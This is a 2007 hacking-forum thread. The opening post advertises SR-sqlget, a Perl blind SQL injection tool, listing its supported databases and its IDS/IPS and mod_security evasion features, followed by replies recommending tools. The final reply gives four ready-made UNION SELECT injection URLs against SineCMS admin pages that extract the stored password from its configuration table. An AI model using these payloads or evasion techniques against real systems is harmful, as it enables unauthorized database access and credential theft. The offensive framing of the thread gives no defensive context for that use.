[Tool] Blind SQL Injection

lostos · July 6, 2007

Blind SQL injection is identical to normal SQL Injection except that when an attacker attempts to exploit an application rather then getting a useful error message they get a generic page specified by the developer instead. This makes exploiting a potential SQL Injection attack more difficult but not impossible. An attacker can still steal data by asking a series of True and False questions through sql statements.

Information provided by Infobyte

SR-sqlget: It's a blind SQL injection tool developed in Perl. It lets you get databases schemas and tables rows. Using a single GET/POST you can access quietly the database structure and using a single GET/POST you can dump every table row to a csv-like file.

Databases supported:

- IBM DB2

- Microsoft SQL Server

- Oracle

- Postgres

- Mysql

- IBM Informix

- Sybase

- Hsqldb (www.hsqldb.org)

- Mimer (www.mimer.com)

- Pervasive (www.pervasive.com)

- Virtuoso (virtuoso.openlinksw.com)

- SQLite

- Interbase/Yaffil/Firebird (Borland)

- H2 (http://www.h2database.com)

- Mckoi (http://mckoi.com/database/)

- Ingres (http://www.ingres.com)

- MonetDB (http://www.monetdb.nl)

- MaxDB (www.mysql.com/products/maxdb/)

- ThinkSQL (http://www.thinksql.co.uk/)

- SQLBase (http://www.unify.com)

Evasion features:

- Full-width/Half-width Unicode encoding

- Apache non standard CR bypass

- mod_security bypass

- Random uppercase request transform

- PHP Magicquotes: encode every string using db CHR function or similar.

- Convert requests to hexadecimal values

- Avoid non-space replacing for /**/ or (\t) tab

- Avoid non || or + concatenation using db concat function or similar.

- Random user-agent

- Random proxy-server

- Random delay request

Common features:

- Database schemate download blacklist

- Cookie array support

- SSL support

- Proxy server support

- Database information dumped in csv format

Reporting:

- Database structure graphication to create impact executive reports require Graphviz library (http://www.graphviz.org/)

Demo:

- Demo features (bypassing IBM ISS Proventia IPS) - http://www.infobyte.com.ar/demo/ISR_sqlget_ISS_proventia_bypass.html

Loverboy · July 26, 2007

nice share...you should try Absinthe too

Kagan · August 12, 2007

too much information for my brains

lazos1993 · August 14, 2007

it's too complicated ^_^

SoulShade · November 21, 2007

Hmm sorry for posting in quite old post...But i think its the apropriate place to ask this:

I dont know nothing about mysql injections, so, i want to know how its done...How can i Insert or Read data from a database with an injection...Info plix, thnx:D

complex · November 23, 2007

Injecting SQL walk through -- http://www.securiteam.com/securityreviews/5DP0N1P76E.html

anath3ma · December 12, 2007

http://[target]/[sinecms_path]/admin/mods_adm.php?

mods=Guestbook&action=modifica&id='+union+select+1,2,3,4,password,

6+from+sine_configuration/*

http://[target]/[sinecms_path]/admin/mods_adm.php?

mods=Calendar&mese=11'+union+select+1,password,3,4,5,6,7,8,9

+from+sine_configuration/*

http://[target]/[sinecms_path]/admin/mods_adm.php?

mods=Calendar&action=modify&id='+union+select+1,2,3,4,password,6,7,8,9

+from+sine_configuration/*

http://[target]/[sinecms_path]/admin/mods_adm.php?

mods=Calendar&anno='+union+select+1,password,3,4,5,6,7,8,9

+from+sine_configuration/*

[Tool] Blind SQL Injection

Recommended Posts

lostos

Loverboy

Kagan

lazos1993

SoulShade

complex

anath3ma

Create an account or sign in to comment

Create an account

Sign in

Posts

Topics

Browse

Activity

Store

Important Information